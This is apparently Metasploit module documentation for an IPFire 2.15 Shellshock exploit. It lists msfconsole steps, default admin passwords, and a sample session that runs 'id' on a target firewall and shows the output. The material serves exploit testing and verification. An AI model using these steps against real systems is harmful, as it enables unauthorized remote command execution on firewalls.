## Vulnerable Application

  Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso)
  Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)

## Verification Steps

  1. Install the firewall
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/ipfire_bashbug_exec```
  4. Do: ```set rhost 10.10.10.10```
  5. Do: ```set PASSWORD admin```
  6. Do: ```set CMD ls```
  7. Do: ```run```
  8. You should see the output of the command that was run.

## Options

  **PASSWORD**

  Password is set at install.  May be blank, 'admin', or 'ipfire'.
  
  **CMD**
  
  This is the command to run on the system.

## Scenarios

  Example of running the ID command
  ```
    msf > use exploit/linux/http/ipfire_bashbug_exec 
    msf exploit(ipfire_bashbug_exec) > set PASSWORD admin
    PASSWORD => admin
    msf exploit(ipfire_bashbug_exec) > set rhost 192.168.2.202
    rhost => 192.168.2.202
    msf exploit(ipfire_bashbug_exec) > set CMD id
    CMD => id
    msf exploit(ipfire_bashbug_exec) > exploit
    
    [+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
    [*] Exploit completed, but no session was created.
  ```
